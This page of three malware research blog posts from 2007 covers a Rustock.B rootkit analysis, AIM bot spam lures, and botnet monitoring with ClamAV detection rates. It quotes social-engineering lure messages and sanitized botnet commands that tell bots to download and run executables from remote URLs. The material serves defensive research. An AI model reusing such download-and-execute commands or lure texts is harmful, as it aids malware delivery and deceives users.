Rustock.B Analysis

Tuesday, January 23. 2007
Frank Boldewin published a very detailed, step-by-step analysis of the Rustock.B rootkit. Rustock is presumably one of the most advanced pieces of malware out there. Very nice read!
Posted by Thorsten Holz in malware at 20:45 | Comments (0) | Trackbacks (0)

AIM Spreading

Thursday, January 11. 2007
If you are using AIM or similar instant messaging tools, you have presumably already seen messages similar to the following:

"which is better for my Myspace backround? http://www.myspace.com/Backgrounds/AllUsers/myspace-background-11.gif or http://www.myspace.com/Backgrounds/AllUsers/myspace-background-162.gif?"

"ooooooo. I bet Cingular isnt happy. http://www.cingular.com/phoneactivations/newphones/loadingringtones.usa.gs is stuck on the ringtones page haha. Supposed to be for "New Phone Activations". I tried it, got my 10. Wallpapers too. hurry b4 its fixed."

"which is a cooler buddy icon for me? http://www.buddyicons.com/humor/humor-icon-112.gif or http://www.buddyicon.com/action/moviestar-icon-11.gif?"

"hey is it ok with you if I upload this picture to my online albums? http://www.eblogs.com/user204/photos/picture36.jpg"


These are typical bots spreading with the help of AIM: the infected machines send AIM messages to other people and try - via social engineering or other trick - to convince the victim to click on the link. The link is then an actual malware binary and thus the innocent user is infected...
Fortunately this kind of attacks can be stopped rather easily since AIM can filter the messages centrally. Polymorphism (e.g., changing the text each time or slight changes in the URL) on the other hand could make filtering harder...
Posted by Thorsten Holz in malware at 08:52 | Comments (0) | Trackbacks (0)

Botnet Monitoring And New Malware Samples

Tuesday, January 9. 2007
When monitoring botnets, you will often see updates within the channel used for command and control. Update means that the bots are instructed to download and execute a binary file from a particular address. A few (sanitized) examples are:
.D0wnL04dF3nR8o http://www.debbiematenopoulos.tv/[...]/timer2.exe c:\timer222.exe 1 -s

!tryagain http://www.freewebtown.com/[...]/a9.exe

.update.g0d http://www.geocities.com/[...]/SkuZ.exe 1

These updates are used by the attackers for different purposes, e.g., migrating the whole botnet to a new C&C server or adding new functionality to the bots. Since these binaries are not actively spreading in the wild, it is rather hard for common antivirus engines to add detection support for them. We collected 40 binaries in the last few weeks this way and ClamAV has rather bad detection rates for them:
----------- SCAN SUMMARY -----------
Known viruses: 86219
Engine version: 0.88.5
Scanned directories: 0
Scanned files: 40
Infected files: 12
Data scanned: 12.66 MB

Seems like it is a long way until we can rely on AV...
Posted by Thorsten Holz in malware at 10:39 | Comments (0) | Trackbacks (0)
(Page 1 of 1, totaling 3 entries)